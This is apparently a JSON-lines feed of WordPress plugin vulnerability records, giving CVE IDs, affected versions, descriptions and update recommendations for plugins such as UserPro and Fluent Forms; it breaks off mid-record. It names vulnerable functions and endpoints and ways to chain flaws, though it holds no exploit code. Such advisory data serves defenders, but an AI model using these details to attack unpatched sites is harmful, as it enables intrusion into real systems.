{"CVE_ID":"CVE-2023-6007","slug":"userpro","versionImpact":"5.1.1","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 5.1.1. This makes it possible for unauthenticated attackers to add, modify, or delete user meta and plugin options.","recommendation":"Update to version 5.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c4f8798-c0f9-4d05-808e-375864a0ad95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c4f8798-c0f9-4d05-808e-375864a0ad95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2449","slug":"userpro","versionEndExcluding":"5.1.2","description":"The UserPro plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 5.1.1. This is due to the plugin using native password reset functionality, with insufficient validation on the password reset function (userpro_process_form). The function uses the plaintext value of a password reset key instead of a hashed value which means it can easily be retrieved and subsequently used. An attacker can leverage CVE-2023-2448 and CVE-2023-2446, or another vulnerability like SQL Injection in another plugin or theme installed on the site to successfully exploit this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de9be7bc-4f8a-4393-8ebb-1b1f141b7585?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de9be7bc-4f8a-4393-8ebb-1b1f141b7585?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5053","slug":"fluentform","versionImpact":"5.1.18","versionEndExcluding":"5.1.19","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized Malichimp API key update due to an insufficient capability check on the verifyRequest function in all versions up to, and including, 5.1.18. This makes it possible for Form Managers with a Subscriber-level access and above to modify the Mailchimp API key used for integration. At the same time, missing Mailchimp API key validation allows the redirect of the integration requests to the attacker-controlled server.","recommendation":"Update to version 5.1.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Routes\\\/api.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Routes\\\/api.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/FormPolicy.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/FormPolicy.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/Integrations\\\/MailChimp\\\/MailChimp.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/Integrations\\\/MailChimp\\\/MailChimp.php#L40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3952","slug":"projectopia-core","versionImpact":"5.1.16","versionEndExcluding":"5.1.17","description":"The Projectopia \u2013 WordPress Project Management plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'pto_remove_logo' function in all versions up to, and including, 5.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.","recommendation":"Update to version 5.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/projectopia-core\\\/trunk\\\/includes\\\/functions\\\/admin\\\/admin_functions.php#L838\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/projectopia-core\\\/trunk\\\/includes\\\/functions\\\/admin\\\/admin_functions.php#L838\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284330\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284330\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7489e8-fe18-4a80-832c-aa62424c538b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7489e8-fe18-4a80-832c-aa62424c538b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4709","slug":"fluentform","versionImpact":"5.1.16","versionEndExcluding":"5.1.17","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018subject\u2019 parameter in versions up to, and including, 5.1.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, and access granted by an administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fe317a6-a391-441a-aac8-c8fa57e73169?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fe317a6-a391-441a-aac8-c8fa57e73169?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L164\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/trunk\\\/app\\\/Services\\\/FormBuilder\\\/Notifications\\\/EmailNotification.php#L194\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2782","slug":"fluentform","versionImpact":"5.1.16","versionEndExcluding":"5.1.17","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \/wp-json\/fluentform\/v1\/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin's settings.","recommendation":"Update to version 5.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0814e7b3-404a-4db5-b564-46c9086ec048?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0814e7b3-404a-4db5-b564-46c9086ec048?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/GlobalSettingsPolicy.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/GlobalSettingsPolicy.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2771","slug":"fluentform","versionImpact":"5.1.16","versionEndExcluding":"5.1.17","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the \/wp-json\/fluentform\/v1\/managers REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.","recommendation":"Update to version 5.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/071195d6-3452-4241-a8d3-92efc84e4850?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/071195d6-3452-4241-a8d3-92efc84e4850?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/RoleManagerPolicy.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088078\\\/fluentform\\\/trunk\\\/app\\\/Http\\\/Policies\\\/RoleManagerPolicy.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4157","slug":"fluentform","versionImpact":"5.1.15","versionEndExcluding":"5.1.16","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.1.15 via deserialization of untrusted input in the extractDynamicValues function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. Successful exploitation requires the attacker to have \"View Form\" and \"Manage Form\" permissions, which must be explicitly set by an administrator. However, this requirement can be bypassed when this vulnerability is chained with CVE-2024-2771.","recommendation":"Update to version 5.1.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8def156a-f2f2-4640-a1c9-c21c74e1f308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8def156a-f2f2-4640-a1c9-c21c74e1f308?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081740\\\/fluentform\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081740\\\/fluentform\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2772","slug":"fluentform","versionImpact":"5.1.13","versionEndExcluding":"5.1.14","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form settings in all versions up to, and including, 5.1.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to the Fluent Forms settings, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This can be chained with CVE-2024-2771 for a low-privileged user to inject malicious web scripts.","recommendation":"Update to version 5.1.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ccba77c-fb90-4906-b0fe-77607ec5df1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ccba77c-fb90-4906-b0fe-77607ec5df1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073857\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073857\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1333","slug":"dk-pricr-responsive-pricing-table","versionImpact":"5.1.10","versionEndExcluding":"5.1.11","description":"The Responsive Pricing Table WordPress plugin before 5.1.11 does not validate and escape some of its Pricing Table options before outputting them back in a page\/post where the related shortcode is embed, which could allow users with the author role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 5.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30546402-03b8-4e18-ad7e-04a6b556ffd7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30546402-03b8-4e18-ad7e-04a6b556ffd7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12045","slug":"essential-blocks","versionImpact":"5.1.0","versionEndExcluding":"5.1.1","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the maker title value of the Google Maps block  in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210374\\\/essential-blocks\\\/tags\\\/5.1.1\\\/src\\\/blocks\\\/google-map\\\/src\\\/marker.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210374\\\/essential-blocks\\\/tags\\\/5.1.1\\\/src\\\/blocks\\\/google-map\\\/src\\\/marker.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b07f3ade-5f10-4621-99a2-18eeab993403?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b07f3ade-5f10-4621-99a2-18eeab993403?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3814","slug":"file-manager-advanced","versionEndExcluding":"5.1.1","description":"The Advanced File Manager WordPress plugin before 5.1.1 does not adequately authorize its usage on multisite installations, allowing site admin users to list and read arbitrary files and folders on the server.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca954ec6-6ebd-4d72-a323-570474e2e339\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca954ec6-6ebd-4d72-a323-570474e2e339\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0364","slug":"real-kit","versionEndExcluding":"5.1.1","description":"The real.Kit WordPress plugin before 5.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e56759ae-7530-467a-b9ba-e9a404afb872\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e56759ae-7530-467a-b9ba-e9a404afb872\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5845","slug":"simple-social-buttons","versionImpact":"5.1.0","versionEndExcluding":"5.1.1","description":"The Simple Social Media Share Buttons WordPress plugin before 5.1.1 leaks password-protected post content to unauthenticated visitors in some meta tags","recommendation":"Update to version 5.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5b59e9e-85e5-4d26-aebe-64757c8495fa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5b59e9e-85e5-4d26-aebe-64757c8495fa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12626","slug":"automatorwp","versionImpact":"5.0.9","versionEndExcluding":"5.1.0","description":"The AutomatorWP \u2013 Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018a-0-o-search_field_value\u2019 parameter in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. When used in conjunction with the plugin's import and code action feature, this vulnerability can be leveraged to execute arbitrary code.","recommendation":"Update to version 5.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209794\\\/automatorwp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209794\\\/automatorwp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8abcc7b-6c68-4fc8-81af-e88624e417dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8abcc7b-6c68-4fc8-81af-e88624e417dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5212","slug":"td-composer","versionImpact":"5.0","versionEndExcluding":"5.1","description":"The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018envato_code[]\u2019 parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_register_forum_user function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db95415a-5354-498b-8368-58c47d9948de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db95415a-5354-498b-8368-58c47d9948de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3886","slug":"td-composer","versionImpact":"5.0","versionEndExcluding":"5.1","description":"The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018envato_code[]\u2019 parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_check_envato_code function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13442","slug":"sf-booking","versionImpact":"5.0","versionEndExcluding":"5.1","description":"The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.0. This is due to the plugin not properly validating a user's identity prior to (1) performing a post-booking auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user's password, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827b5482-cb42-4aaa-80b5-3d0143fcead8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827b5482-cb42-4aaa-80b5-3d0143fcead8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0830","slug":"wp-comment-fields","versionEndExcluding":"5.1","description":"The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0. This is due to missing or incorrect nonce validation on several ajax actions. This makes it possible for unauthenticated attackers to invoke those actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. As a result, they may modify comment form fields and update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-comment-fields\\\/trunk\\\/classes\\\/admin.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-comment-fields\\\/trunk\\\/classes\\\/admin.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0829","slug":"wp-comment-fields","versionEndExcluding":"5.1","description":"The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.0. This is due to missing or incorrect capability checks on several ajax actions. This makes it possible for authenticated attackers, with subscriber access or higher, to invoke those actions. As a result, they may modify comment form fields and update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-comment-fields\\\/trunk\\\/classes\\\/admin.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-comment-fields\\\/trunk\\\/classes\\\/admin.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6844","slug":"iframe","versionImpact":"5.0","versionEndExcluding":"5.1","description":"The iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to and including 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c16e16dc-8888-4222-862f-a57a9f14e7f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c16e16dc-8888-4222-862f-a57a9f14e7f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/trunk\\\/iframe.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/trunk\\\/iframe.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/trunk\\\/iframe.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/trunk\\\/iframe.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089839%40iframe%2Ftrunk&old=3036990%40iframe%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089839%40iframe%2Ftrunk&old=3036990%40iframe%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12622","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.0.7","versionEndExcluding":"5.0.8","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_cart_button' and 'wp_cart_display_product' shortcodes in all versions up to, and including, 5.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/includes\\\/wpsc-shortcodes-related.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/includes\\\/wpsc-shortcodes-related.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210506\\\/w